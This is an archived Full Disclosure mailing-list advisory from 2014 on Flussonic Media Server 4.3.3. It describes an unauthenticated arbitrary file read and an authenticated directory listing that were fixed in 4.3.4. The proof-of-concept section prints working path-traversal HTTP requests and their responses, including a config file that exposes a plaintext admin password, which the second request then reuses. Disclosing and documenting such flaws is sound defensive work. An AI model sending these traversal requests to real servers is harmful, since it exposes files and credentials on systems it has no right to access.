[prev in list] [next in list] [prev in thread] [next in thread]
List: full-disclosure
Subject: [FD] Flussonic Media Server 4.3.3 Multiple Vulnerabilities
From: Onur Alanbel <onur.a () windowslive ! com>
Date: 2014-06-29 19:56:22
Message-ID: DUB127-W799C1D67FAE1697EDED9D295050 () phx ! gbl
[Download RAW message or body]
Document Title:
============
Flussonic Media Server 4.3.3 Multiple Vulnerabilities
Release Date:
===========
June 29, 2014
Product & Service Introduction:
========================
Flussonic is a mutli-protocol streaming server with support for many protocols, including HDS, \
HLS, RTMP, RTSP, HTTP, MPEG-TS. Flussonic has the capability of capturing multimedia from \
external sources, such as video cameras, satellite TV and other multimedia servers (Wowza, \
Flash Media Server and Red5).
Flussonic operates on the highly flexible and fast Erlang platform that facilitates impressive \
performance during parallel data processing, failure safety for servers, and scaling options up \
to a sophisticated distributed data network.
Abstract Advisory Information:
=======================
BGA Security Team discovered an arbitrary file read and arbitrary directory listing \
vulnerability in Flussonic Media Server 4.3.3
Vulnerability Disclosure Timeline:
=========================
June 26, 2014 : Contact with Vendor
June 26, 2014 : Vendor Response
June 26, 2014 : Version 4.3.4 Deployed
June 29, 2014 : Public Disclosure
Discovery Status:
=============
Published
Affected Product(s):
===============
Erlyvideo, LLC
Product: Flussonic Media Server 4.1.25 - 4.3.3
Exploitation Technique:
==================
AFR: Remote, Unauthenticated
ADL: Remote, Authenticated
Severity Level:
===========
High
Technical Details & Description:
========================
1. Arbitrary File Read (Unauthenticated)
It’s possible to read any files from the server (with the application’s user’s permissions) by \
a simple HTTP GET request. Flussonic’s web interface login information can be found as \
plaintext by reading /etc/flussonic/flussonic.conf; thus, it’s possible to login any Flussonic \
web interface using that method.
2. Arbitrary Directory Listing (Authenticated)
It’s possible to list any directories’ content sending a HTTP GET request to \
“flussonic/api/list_files” with the parameter “subpath=directory”.
Proof of Concept (PoC):
==================
Proof of Concept AFR Request & Response:
GET /../../../etc/flussonic/flussonic.conf HTTP/1.1
Host: 6.6.6.100:8080
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:30.0) Gecko/20100101 Firefox/30.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
HTTP/1.1 200 OK
Connection: keep-alive
Server: Cowboy
Date: Thu, 26 Jun 2014 09:50:57 GMT
Content-Length: 191
Content-Type: text/plain
Last-Modified: Tue, 24 Jun 2014 22:10:53 GMT
Etag: 1452b98181c562b2e2d041a3e1fe2af0cffe8687
# Default ports Flussonic M1 Media server listens on
http 80;
http 8080;
rtmp 1935;
rtsp 554;
pulsedb /var/run/flussonic;
edit_auth flussonic letmein!;
live mylive;
file vod {
path priv;
}
2. Proof of Concept ADR Request & Response:
GET /flussonic/api/list_files?subpath=../../../etc HTTP/1.1
Host: 6.6.6.100:8080
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:30.0) Gecko/20100101 Firefox/30.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Authorization: Basic Zmx1c3NvbmljOmxldG1laW4h
Connection: keep-alive
HTTP/1.1 200 OK
Connection: keep-alive
Server: Cowboy
Date: Thu, 26 Jun 2014 11:04:12 GMT
Content-Length: 7555
X-Route-Time: 28
X-Run-Time: 8090
Content-Type: application/json
{“files":[{"name":"X11","type":"directory"},{"name":"acpi","type":"directory"},{"name":"adduser. \
conf","type":"file","prefix":"vod"},{"name":"alternatives","type":"directory"},{"name":"apache2","type":"directory"},{"name":"apm","type":"directory"},
………
{“name":"xml","type":"directory"},{"name":"zsh_command_not_found","type":"file","prefix":"vod"}]}
Solution Fix & Patch:
================
Update version 4.3.4
Security Risk:
==========
The risk of the vulnerabilities above estimated as high and medium.
Credits & Authors:
==============
Bilgi Güvenliđi Akademisi
Disclaimer & Information:
===================
The information provided in this advisory is provided as it is without any warranty. BGA \
disclaims all warranties, either expressed or implied, including the warranties of \
merchantability and capability for a particular purpose. BGA or its suppliers are not liable in \
any case of damage, including direct, indirect, incidental, consequential loss of business \
profits or special damages.
Domain: http://bga.com.tr/advisories.html
Social: http://twitter.com/bgasecurity
Contact: bilgi@bga.com.tr
Copyright © 2014 | BGA
_______________________________________________
Sent through the Full Disclosure mailing list
http://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
[prev in list] [next in list] [prev in thread] [next in thread]
Configure |
About |
News |
Add a list |
Sponsored by KoreLogic